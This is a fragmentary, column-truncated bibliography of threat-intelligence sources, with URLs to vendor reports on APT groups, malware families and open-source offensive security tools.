FireEye APFireEye. ( https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf
FireEye APFireEye. ( https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
FireEye APHawley et ahttps://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-
FireEye APPlan, F., e https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-act
FireEye APFraser, N., https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
FireEye APGlyer, C, e https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-usin
FireEye B Glyer, C.. https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf
FireEye BooAndonov, Dhttps://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html
FireEye CABennett, J. https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
FireEye ClaChen, X., S https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explor
FireEye ClaScott, M.. https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html
FireEye Cl Eng, E., Ca https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-d
FireEye DL Amanda Stew https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading
FireEye EP Winters, R.https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12
FireEye Ex Bromiley, M https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microso
FireEye FE Patil, S. ( https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribu
FireEye FI FireEye iSI https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf
FireEye FI McKeague,https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
B
FireEye FINFireEye Thrhttps://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf
FireEye FINCarr, N., e https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
FireEye FI Carr, N., e https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global
FireEye FI Miller, S., https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03
FireEye FI Carr, N, et https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-tech
FireEye FI Erickson, J https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
FireEye Fi Kizhakkinanhttps://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html
FireEye Fi McLellan, https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-
FireEye H Patil, S. a https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-haw
FireEye HIKGlyer, C., https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techn
FireEye HaVengerik, Bhttps://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
FireEye HaVengerik, Bhttps://www2.fireeye.com/WBNR-14Q4NAMFIN4.html
FireEye HaFireEye Thrhttps://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html
FireEye HaAnubhav, A. https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html
FireEye HikGlyer, C., https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techn
FireEye K Kimberly Ghttps://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-cha
FireEye Kn Elovitz, S. https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html
FireEye M Leong, R., https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-message
FireEye MaKennelly, J https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with
FireEye MeSierra, E., https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users
FireEye M Singh, S. e https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phi
FireEye N Maniath, Shttps://www.mandiant.com/resources/blog/dissecting-netwire-phishing-campaigns-usage-process-hollo
FireEye ObBohannon,https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06
D
FireEye OpFireEye Labhttps://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
FireEye OpMoran, N.,https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html
FireEye OpVilleneuve https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-
FireEye OpVilleneuve https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf
FireEye OuMcWhirt, M. https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-pa
FireEye PL FireEye La https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-firee
FireEye PODunwoody,https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
M
FireEye Pe FireEye. (2 https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-
FireEye PoiFireEye. (2 https://www.mandiant.com/sites/default/files/2021-09/rpt-poison-ivy.pdf
FireEye Ra Zafra, D., https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disru
FireEye Re Anubhav, Ahttps://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
FireEye Re Scavella, T https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html
FireEye Ry Goody, K., https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to
FireEye S FireEye. ( https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compr
FireEye SUStephen Eck https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html
FireEye S FireEye. ( https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-c
FireEye S Smith, L., https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-u
FireEye S FireEye. (2 https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html
FireEye Sh FireEye. ( https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-opera
FireEye So FireEye. ( https://web.archive.org/web/20220122121143/https://www.fireeye.com/content/dam/fireeye-www/cu
FireEye TE FireEye Int https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-
FireEye TR Miller, S. https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristati
FireEye TR Miller, S, https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-de
FireEye TR Blake Johnshttps://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-tri
FireEye Ta Singh, S., https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
FireEye Ur Vaish, A. &https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique
FireEye W Ballenthin https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-man
FireEye WaBerry, A., https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
FireEye a FireEye Th https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
Flashpoint Platt, J. a https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/
ForcepointDela Paz, Rhttps://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan
ForcepointGriffin, https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-contro
ForcepointSomerville,https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware
Forcepoin Settle, A., https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analy
Fortinet AgZhang, X. ( https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
Fortinet A Zhang, X. https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html
Fortinet DiNeeamni, Dhttps://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider
Fortinet E Xiaopeng Zh https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-1.html
Fortinet MZhang, X. ( https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-fina
Fortinet R Bacurio, F. https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html
Fortinet TrBacurio Jr. https://www.fortinet.com/blog/threat-research/trickbot-s-new-reconnaissance-plugin.html
FoxIT Woc Dantzig, M.https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
Fysbis Dr Doctor Web https://vms.drweb.com/virus/?i=4276269
Fysbis PaloBryan Lee ahttps://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/
G Data SodHan, Karstehttps://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-
GDATA ZeuEbach, L. ( https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf
Gallagher Gallagher, http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-website
Ge 2011 Ge, L. (20 http://www.symantec.com/connect/blogs/bios-threat-showing-again
Gh0stRAT Quinn, J. ( https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant
Gigamon BSavelesky, https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-a
Gigamon Be Slowik, J. https://vblocalhost.com/uploads/VB2021-Slowik.pdf
GitHub Bl Robbins, A.https://github.com/BloodHoundAD/BloodHound
GitHub CertHarmJ0y ethttps://github.com/GhostPack/Certify/
GitHub DisDormann, W https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b
GitHub IADNSA IAD. ( https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates
GitHub InvRobertson,https://github.com/Kevin-Robertson/Inveigh
GitHub InvBohannon,https://github.com/danielbohannon/Invoke-Obfuscation
GitHub InvAdams, B. https://github.com/peewpw/Invoke-PSImage
GitHub LaZZanni, A. ( https://github.com/AlessandroZ/LaZagne
GitHub M wdormann.https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7
(
GitHub MaiBullock, B. https://github.com/dafthack/MailSniper
GitHub Mim Deply, B., https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
GitHub Mim Deply, B., https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
GitHub PS Barrett Adahttps://github.com/peewpw/Invoke-PSImage
GitHub PSPHarmJ0y ethttps://github.com/GhostPack/PSPKIAudit
GitHub PacRhino Securhttps://github.com/RhinoSecurityLabs/pacu
GitHub Po Nettitude. https://github.com/nettitude/PoshC2_Python
GitHub PowPowerShellhttps://github.com/PowerShellMafia/PowerSploit
GitHub Pu Nicolas Verhttps://github.com/n1nj4sec/pupy
GitHub QuMaxXor. (n.https://github.com/quasar/QuasarRAT
GitHub Re Gaffie, L. https://github.com/SpiderLabs/Responder
GitHub Ru Harmj0y. (nhttps://github.com/GhostPack/Rubeus
GitHub SHBNSA IAD. (2https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard
GitHub SIL Salvati, M https://github.com/byt3bl33d3r/SILENTTRINITY
GitHub SIL Salvati, M. https://github.com/byt3bl33d3r/SILENTTRINITY/tree/master/silenttrinity/core/teamserver/modules/boo
GitHub SlivBishopFox.https://github.com/BishopFox/sliver/
GitHub Sli BishopFox.https://github.com/BishopFox/sliver/wiki/DNS-C2
GitHub Sli BishopFox.https://github.com/BishopFox/sliver/blob/7489c69962b52b09ed377d73d142266564845297/client/com
GitHub SlivBishopFox.https://github.com/BishopFox/sliver/wiki/Transport-Encryption
GitHub SlivBishopFox.https://github.com/BishopFox/sliver/tree/master/client/command/filesystem
GitHub Sli BishopFox.https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2
GitHub SlivBishopFox.https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/comm
GitHub SlivBishopFox.https://github.com/BishopFox/sliver/tree/58a56a077f0813bb312f9fa4df7453b510c3a73b/implant/slive
GitHub SlivBishopFox.https://github.com/BishopFox/sliver/blob/master/implant/sliver/screen/screenshot_windows.go
GitHub Sli BishopFox.https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/comm
GitHub TurTDL Projecthttps://github.com/hfiref0x/TDL
Github AD-Twi1ight. ( https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs
Github Covcobbr. (202https://github.com/cobbr/Covenant
Github KoaMagius, J., https://github.com/offsecginger/koadic
Github PowSchroeder,https://github.com/PowerShellEmpire/Empire
Github RapRapid7. (2 https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate
Github UA UACME Proj https://github.com/hfiref0x/UACME
Github_SILbyt3bl33d3r https://github.com/byt3bl33d3r/SILENTTRINITY
Glitch-Cat Sandvik, R https://www.glitch-cat.com/blog/green-lambert-and-attack
Gmail DeleGoogle. (n.https://support.google.com/a/answer/7223765?hl=en
Google CloRufus Browhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-us-state-governments
Google CloMike Stokke https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust
Google CloGoogle. (n.https://cloud.google.com/kms/docs/key-rotation
Google EXOStolyarov, https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/
Google EleHuntley, S.https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats/
Google Ira Bash, A. (2 https://blog.google/threat-analysis-group/countering-threats-iran/
Google TAGShields, W.https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/
Google TAGWeidemann, https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
Google TAGHuntley, S.https://blog.google/threat-analysis-group/update-threat-landscape-ukraine
Google WorGoogle Work https://developers.google.com/apps-script/guides/admin/monitor-restrict-oauth-scopes
Google WorGoogle. (n.https://support.google.com/a/answer/9646351
Google WorGoogle. (n.https://support.google.com/a/answer/60781
Google_WiMorgan, K.https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
GovCERT CGovCERT. (https://web.archive.org/web/20170718174931/https://www.melani.admin.ch/dam/melani/de/dokume
Graeber 2 Graeber, M. http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
Group IB ARostovcev,https://www.group-ib.com/blog/colunmtk-apt41/
Group IB CMatveeva, https://www.group-ib.com/blog/cobalt
V
Group IB GPriego, A. https://www.group-ib.com/blog/grimagent/
Group IB RSkulkin, O. https://www.group-ib.com/blog/rtm
Group IB Group IB. https://www.group-ib.com/whitepapers/ransomware-uncovered.html
Group IB Group IB. https://groupib.pathfactory.com/ransomware-reports/prolock_wp
Group IB S Group-IB. (https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf
Group IB S Group-IB. (https://go.group-ib.com/report-silence-en?_gl=1*d1bh3a*_ga*MTIwMzM5Mzc5MS4xNjk4OTI5NzY4*_g
Group-IB Group-IB an http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf
Guidepoin Riley, W. https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/
HP RaspberPatrick Schhttps://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files/
HP SVCRead Schlapfer, https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
Hacker Ne Khandelwal, https://thehackernews.com/2018/06/chinese-watering-hole-attack.html
HackerNews Lakshmanan https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html
Haq 2014 Haq, T., Mohttps://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.htm
Harmj0y DCSchroeder,http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
Harmj0y DoSchroeder,https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944
Harmj0y KeSchroeder,https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
Hornet SecSecurity Lahttps://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wil
HowToGeek Chris Hoff https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/
Huntress I Team Huntrhttps://www.huntress.com/blog/investigating-new-inc-ransom-group-activity
Huntress Carvey, H. https://www.huntress.com/blog/lolbin-to-inc-ransomware
Huntress NDray Agha.https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-npps
IBM Grando Abramov, Dhttps://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/
IBM ITG07 McMillen, D https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/
IBM ITG18 Wikoff, A. https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/
IBM IcedI Kessem, L.,https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/
IBM MegaCDel Fierro, https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex
IBM RansoSingleton, https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organ
IBM TA505Frydrych, https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/
IBM TrickBKeshet, L. https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
IBM ZeroClKessem, L. https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-m
ITSyndicateKondratiev,https://itsyndicate.org/blog/disabling-dangerous-php-functions/
Imminent Unit 42. ( https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/
Impacket TSecureAuth. https://www.secureauth.com/labs/open-source-tools/impacket
Increasing Boelen, M.https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/
IndustroyeDaniel Kap https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks
Infoblox L Hoang, M. https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22
(
InsiderThr Sander, J. https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks
Intego Shl Vrijenhoek,https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-t
Intego Shl Long, Joshuhttps://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/
Intel 471 RIntel 471 Mhttps://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operatio
Intel Hard Intel. (201 https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologie
Intezer Au Rosenberg,http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/
Intezer DokFishbein, Nhttps://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-th
Intezer H Sanmillan, https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
Intezer Te Fishbein, Nhttps://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-co
Intrinsec Bichet, J. https://www.intrinsec.com/egregor-prolock/?cn-reloaded=1
Invincea X Belcher, P. https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/
IronNet Bl Demboski, https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape
M
IssueMakerIssueMakerhttp://www.issuemakerslab.com/research3/
JPCERT ChCNakamura,http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html
JPCert Bla Tomonaga,https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html
JPCert PLE Tomonaga,https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html
JPCert TSC Tomonaga,https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html
Janicab Thomas. (20 https://web.archive.org/web/20230331162455/https://www.thesafemac.com/new-signed-malware-cal
Joe Sec Tri Joe Securithttps://www.joesecurity.org/blog/498839998833561473
JoeSecurit Joe Securithttps://www.joesandbox.com/analysis/318027/0/html
Joint CSA FBI, FinCE https://www.ic3.gov/Media/News/2022/220318.pdf
